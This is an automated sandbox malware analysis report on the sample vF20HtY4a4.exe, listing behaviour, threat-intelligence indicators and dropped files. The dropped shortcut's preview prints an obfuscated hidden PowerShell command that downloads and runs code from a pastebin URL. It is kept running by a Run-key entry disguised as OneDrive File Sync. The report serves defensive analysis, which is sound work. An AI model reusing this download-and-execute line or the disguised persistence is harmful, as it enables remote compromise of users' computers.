                                            • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target vF20HtY4a4.exe, PID 6032 because it is empty
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                            • VT rate limit hit for: vF20HtY4a4.exe

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            10:07:58API Interceptor378x Sleep call for process: powershell.exe modified
                                            16:08:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
                                            16:08:27AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run OneDrive File Sync "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"

                                            Joe Sandbox View / Context

                                            IPs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            162.159.136.232S23UhdW5DH.exeGet hashmaliciousLummaC, Glupteba, SmokeLoader, Socks5Systemz, StealcBrowse
                                            • discord.com/administrator/index.php
                                            104.20.4.235OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                            • pastebin.com/raw/sA04Mwk2
                                            gaber.ps1Get hashmaliciousUnknownBrowse
                                            • pastebin.com/raw/sA04Mwk2
                                            cr_asm_crypter.ps1Get hashmaliciousUnknownBrowse
                                            • pastebin.com/raw/sA04Mwk2
                                            sostener.vbsGet hashmaliciousNjratBrowse
                                            • pastebin.com/raw/V9y5Q5vv
                                            sostener.vbsGet hashmaliciousXWormBrowse
                                            • pastebin.com/raw/V9y5Q5vv
                                            envifa.vbsGet hashmaliciousRemcosBrowse
                                            • pastebin.com/raw/V9y5Q5vv
                                            New Voicemail Invoice 64746w .jsGet hashmaliciousWSHRATBrowse
                                            • pastebin.com/raw/NsQ5qTHr
                                            Invoice Payment N8977823.jsGet hashmaliciousWSHRATBrowse
                                            • pastebin.com/raw/NsQ5qTHr
                                            Pending_Invoice_Bank_Details_XLSX.jsGet hashmaliciousWSHRATBrowse
                                            • pastebin.com/raw/NsQ5qTHr
                                            Pending_Invoice_Bank_Details_kofce_.JS.jsGet hashmaliciousWSHRATBrowse
                                            • pastebin.com/raw/NsQ5qTHr
                                            104.18.111.161VvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                            • tinyurl.com/muewsc78
                                            5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                            • tinyurl.com/yeykydun
                                            BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                            • tinyurl.com/yeykydun
                                            SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                            • tinyurl.com/yk3s8ubp

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            tinyurl.comVvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                            • 104.18.111.161
                                            5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                            • 104.18.111.161
                                            HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                            • 104.17.112.233
                                            BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                            • 104.18.111.161
                                            https://tinyurl.com/y9r5fvasGet hashmaliciousUnknownBrowse
                                            • 104.17.112.233
                                            https://tinyurl.com/5xa2ubd7Get hashmaliciousUnknownBrowse
                                            • 104.17.112.233
                                            SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                            • 104.17.112.233
                                            SecuriteInfo.com.Trojan.GenericKD.74126573.27896.28845.dllGet hashmaliciousMetasploitBrowse
                                            • 104.17.112.233
                                            SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dllGet hashmaliciousAsyncRAT, XWormBrowse
                                            • 104.18.111.161
                                            balcao242609.vbsGet hashmaliciousUnknownBrowse
                                            • 104.18.111.161
                                            pastebin.comVvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                            • 172.67.19.24
                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                            • 104.20.3.235
                                            5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                            • 104.20.3.235
                                            HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                            • 104.20.4.235
                                            xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                            • 172.67.19.24
                                            steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                            • 172.67.19.24
                                            Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                            • 104.20.3.235
                                            gaber_pyld.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                            • 172.67.19.24
                                            cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                            • 172.67.19.24
                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                            • 104.20.4.235
                                            discord.comVvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                            • 162.159.138.232
                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.137.232
                                            5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                            • 162.159.128.233
                                            HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                            • 162.159.136.232
                                            xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.138.232
                                            steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.138.232
                                            Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.138.232
                                            cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                            • 162.159.138.232
                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.138.232
                                            BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                            • 162.159.137.232
                                            raw.githubusercontent.comVvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                            • 185.199.108.133
                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                            • 185.199.108.133
                                            5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                            • 185.199.109.133
                                            HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                            • 185.199.109.133
                                            xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                            • 185.199.110.133
                                            steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                            • 185.199.109.133
                                            Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                            • 185.199.111.133
                                            cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                            • 185.199.111.133
                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                            • 185.199.109.133
                                            BeginSync lnk.lnkGet hashmaliciousUnknownBrowse
                                            • 185.199.111.133

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            CLOUDFLARENETUSVvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                            • 104.18.111.161
                                            https://pub-d44e201c1f3e400586cb81b0f2d48f61.r2.dev/owasecure.htm?top=redacted_emailGet hashmaliciousHTMLPhisherBrowse
                                            • 104.17.25.14
                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.137.232
                                            5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                            • 162.159.128.233
                                            HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                            • 104.17.112.233
                                            xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                            • 172.67.19.24
                                            steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.138.232
                                            Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.138.232
                                            gaber_pyld.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                            • 172.67.19.24
                                            cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                            • 162.159.138.232
                                            CLOUDFLARENETUSVvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                            • 104.18.111.161
                                            https://pub-d44e201c1f3e400586cb81b0f2d48f61.r2.dev/owasecure.htm?top=redacted_emailGet hashmaliciousHTMLPhisherBrowse
                                            • 104.17.25.14
                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.137.232
                                            5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                            • 162.159.128.233
                                            HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                            • 104.17.112.233
                                            xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                            • 172.67.19.24
                                            steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.138.232
                                            Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.138.232
                                            gaber_pyld.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                            • 172.67.19.24
                                            cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                            • 162.159.138.232
                                            FASTLYUSVvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                            • 185.199.108.133
                                            https://pub-d44e201c1f3e400586cb81b0f2d48f61.r2.dev/owasecure.htm?top=redacted_emailGet hashmaliciousHTMLPhisherBrowse
                                            • 151.101.2.137
                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                            • 185.199.108.133
                                            5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                            • 185.199.109.133
                                            HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                            • 185.199.109.133
                                            xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                            • 185.199.110.133
                                            steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                            • 185.199.109.133
                                            Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                            • 185.199.111.133
                                            cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                            • 185.199.111.133
                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                            • 185.199.109.133
                                            CLOUDFLARENETUSVvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                            • 104.18.111.161
                                            https://pub-d44e201c1f3e400586cb81b0f2d48f61.r2.dev/owasecure.htm?top=redacted_emailGet hashmaliciousHTMLPhisherBrowse
                                            • 104.17.25.14
                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.137.232
                                            5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                            • 162.159.128.233
                                            HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                            • 104.17.112.233
                                            xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                            • 172.67.19.24
                                            steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.138.232
                                            Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.138.232
                                            gaber_pyld.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                            • 172.67.19.24
                                            cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                            • 162.159.138.232

                                            JA3 Fingerprints

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            3b5074b1b5d032e5620f69f9f700ff0eVvPrGsGGWH.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                            • 162.159.136.232
                                            • 104.20.4.235
                                            • 185.199.110.133
                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.136.232
                                            • 104.20.4.235
                                            • 185.199.110.133
                                            5UIy3bo46y.dllGet hashmaliciousUnknownBrowse
                                            • 162.159.136.232
                                            • 104.20.4.235
                                            • 185.199.110.133
                                            HQsitBLlOv.dllGet hashmaliciousUnknownBrowse
                                            • 162.159.136.232
                                            • 104.20.4.235
                                            • 185.199.110.133
                                            xK44OOt7vD.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.136.232
                                            • 104.20.4.235
                                            • 185.199.110.133
                                            steamcodegenerator.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.136.232
                                            • 104.20.4.235
                                            • 185.199.110.133
                                            Lm9IJ4r9oO.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.136.232
                                            • 104.20.4.235
                                            • 185.199.110.133
                                            gaber_pyld.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                            • 162.159.136.232
                                            • 104.20.4.235
                                            • 185.199.110.133
                                            cr_asm_hiddenz.ps1Get hashmaliciousAsyncRAT, XWormBrowse
                                            • 162.159.136.232
                                            • 104.20.4.235
                                            • 185.199.110.133
                                            OSLdZanXNc.exeGet hashmaliciousUnknownBrowse
                                            • 162.159.136.232
                                            • 104.20.4.235
                                            • 185.199.110.133

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has command line arguments, Archive, ctime=Sat May 7 04:20:03 2022, mtime=Mon Sep 9 22:58:05 2024, atime=Sat May 7 04:20:03 2022, length=69632, window=hidenormalshowminimized
                                            Category:dropped
                                            Size (bytes):1728
                                            Entropy (8bit):4.527272298423835
                                            Encrypted:false
                                            SSDEEP:24:8MBsCCbRKrzcAJBkr+/4MsPsiqxlD2uxmCnBuG4aVlilzXQaR3+hab/Ia7/OB+/q:8zD6JUUPx2uxFu+LozXv3KabINBY0
                                            MD5:724AA21828AD912CB466E3B0A79F478B
                                            SHA1:41B80A72CE8C2F1F54C1E595872D7ECD63D637CD
                                            SHA-256:D675147502CF2CA50BC4EC9A0D95DED0A5A8861BEC3D24FCD9EDD3F4B5718E70
                                            SHA-512:B88218356ABF805B4263B0960DC6D0FBEC47E2135FA74839449CA860F727D54A1014062C9E7DB0652E81C635C8C0C177B47326DADAF3AE34ED058FA085F1E98C
                                            Malicious:true
                                            Preview:L..................F.... ...|%h..a.........|%h..a..........................E....P.O. .:i.....+00.../C:\...................V.1......Y..0.Windows.@......T,*)Y................................W.i.n.d.o.w.s.....Z.1.....$Yh...System32..B......T,*)Y......L_.....................!.S.y.s.t.e.m.3.2.....f.2......T.* .forfiles.exe..J......T.*)Y.....A...........t..........t..f.o.r.f.i.l.e.s...e.x.e.......V...............4.......U...........`8......Windows.C:\Windows\System32\forfiles.exe..&.....\.....\.....\.W.i.n.d.o.w.s.\.S.y.s.t.e.m.3.2.\.f.o.r.f.i.l.e.s...e.x.e.../.p. .c.:.\.w.i.n.d.o.w.s.\.s.y.s.t.e.m.3.2. ./.m. .n.o.t.e.p.a.d...e.x.e. ./.c. .".p.o.w.e.r.s.h.e.l.l...e.x.e. .-.c.o.m.m.a.n.d. .p.o.w.e.r.s.h.e.l.l. .-.w.i.n.d.o.w.s.t.y.l.e. .h. .-.c.o.m.m.a.n.d. .'.s.a.l. .f.a.t.b.a.k.e. .c.a.l.c.;.s.a.l. .c.a.l.l.i.t. .i.E.x.;. .s.a.l. .$.e.n.v.:.o.s. .i.W.r.;. .c.a.l.l.i.T.(.W.I.N.D.O.W.S._.N.T. .p.a.s.t.e.b.i.n...c.o.m./.r.a.w./.s.A.0.4.M.w.k.2. .-.u.s.e.b.a.s.i.c.p.a.r.s.i.n.g.).'."..

                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):11608
                                            Entropy (8bit):4.890472898059848
                                            Encrypted:false
                                            SSDEEP:192:39smG3YrKkDQp5SVsm5emln9smKp5FiMDOmEN3H+OHgFKxoeRH83YrKk7Vsm5emK:cEU/iQ0HzAFGLCib4Sib47VoGIpN6KQc
                                            MD5:66B287A82D897FD706FD1C8A5098E8A5
                                            SHA1:9C5962E1ECA4CFC2D5BC8BA4C6C737F77EC524F8
                                            SHA-256:5009DAAF58FD83E555547764CC1AE0F55B664B4A41AEF5EECB1963C7F6A0C413
                                            SHA-512:5A5713E9F6F1A32E7120838EA5CC4651D1ADA684685D11B6DDEF1CCBD4ED759DAD9D857C36FB2F9B4B6637BCC27ABC3C89BE9428C4CB117817D3F6468DD1DEBB
                                            Malicious:false
                                            Preview:PSMODULECACHE......x.g.z..I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psm1........SafeGetCommand........Get-ScriptBlockScope....$...Get-DictionaryValueFromFirstKeyFound........New-PesterOption........Invoke-Pester........ResolveTestScripts........Set-ScriptBlockScope........-Z..z..a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Unregister-PackageSource........Save-Package........Install-PackageProvider........Find-PackageProvider........Install-Package........Get-PackageProvider........Get-Package........Uninstall-Package........Set-PackageSource........Get-PackageSource........Find-Package........Register-PackageSource........Import-PackageProvider.........x.g.z..I...C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........AfterEa

                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):64
                                            Entropy (8bit):1.1940658735648508
                                            Encrypted:false
                                            SSDEEP:3:Nlllulsl1Z:NllUE
                                            MD5:5B7FE35CFBBB301E5437F19E48F41530
                                            SHA1:2CF5F3FCCE50996EA3DF2F57A7DC84641D2C9D0E
                                            SHA-256:2D35FE48F5EEE9F285CAF3B74BDE21546FBE39AD688684383FD5887F525E58D2
                                            SHA-512:D4F18E23B8A7374574EC4E9ECEB2A4DB4901BD178E41270DC840BC292EBEB6589893B750CF83F62B9CE2AB301EF5CAC35B8C5D8BD9D8FB775F7E6CC289614E3F
                                            Malicious:false
                                            Preview:@...e...............................R.y".............@..........

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_00c3ylic.5jr.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c4vxvigq.c4b.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fbt0tg1a.xkx.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_noa0m1e4.s4s.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ocfr0p1l.wcr.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q0boq1sv.wkx.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uileitpw.ty5.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vz23xivp.214.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xkaxfhhk.jbk.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yg4uhxie.5kq.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            \Device\ConDrv

                                            Download File
                                            Process:C:\Users\user\Desktop\vF20HtY4a4.exe
                                            File Type:ASCII text, with CRLF, LF line terminators
                                            Category:dropped
                                            Size (bytes):199
                                            Entropy (8bit):4.621901208289922
                                            Encrypted:false
                                            SSDEEP:6:l/1KUMFOR8PEpYBYLLELptheFuiBQIBhty:5MF8oEpYBjpLeYIBny
                                            MD5:1E546A14D1D9A4976E6F9872322BC295
                                            SHA1:6548F9F3811B088D64CA3392BBBC404032B63E68
                                            SHA-256:EE7262265283097B23FDE4B00BBB88450E7838C0DBF7EC41B68B0DD642CADFFB
                                            SHA-512:9D71B2D057A7AC6FD39263D04EF4973451DE29FF0B061E12FC9C81AFEC0D9DF7AFC9C01527CC2F3E42257DC72ED947373DB10B28F1ED520E206E3517A4B5E494
                                            Malicious:false
                                            Preview:Usage: Origami.exe <file> <mode> or Origami.exe <file>..Available modes:.-pes: Uses additional PE section for the payload data.-dbg: Uses PE Debug Directory for the payload data..Default mode: -pes..

                                            Static File Info

                                            General

                                            File type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):5.792685453634147
                                            TrID:
                                            • Win64 Executable Console Net Framework (206006/5) 48.58%
                                            • Win64 Executable Console (202006/5) 47.64%
                                            • Win64 Executable (generic) (12005/4) 2.83%
                                            • Generic Win/DOS Executable (2004/3) 0.47%
                                            • DOS Executable Generic (2002/1) 0.47%
                                            File name:vF20HtY4a4.exe
                                            File size:24'064 bytes
                                            MD5:d17a39ca8331a4ce65261b1b6dc7e6ac
                                            SHA1:7972d0341973a0816d2534f187676f9c00dc38c7
                                            SHA256:f06b0c9ae4553b0558c06ecfcb657a9f1d5a42da37caec81ae4a91dd5d03b332
                                            SHA512:eaf6c0af6ebb30b745e89cc4425097611cfaf6516635a2e246b003e4efe5120b755e8358e5134ec0289769361791ebe866e9ccd6268e24a42adcfbd23d785b49
                                            SSDEEP:384:AiSnaFctej9mJ3aN8cmUdxfFujScZCLHABsbQVWyO+CrNCzgSodIyII5/rSKrp2:AiSjej9maN8GdGucubN+iLdIyIkJ2
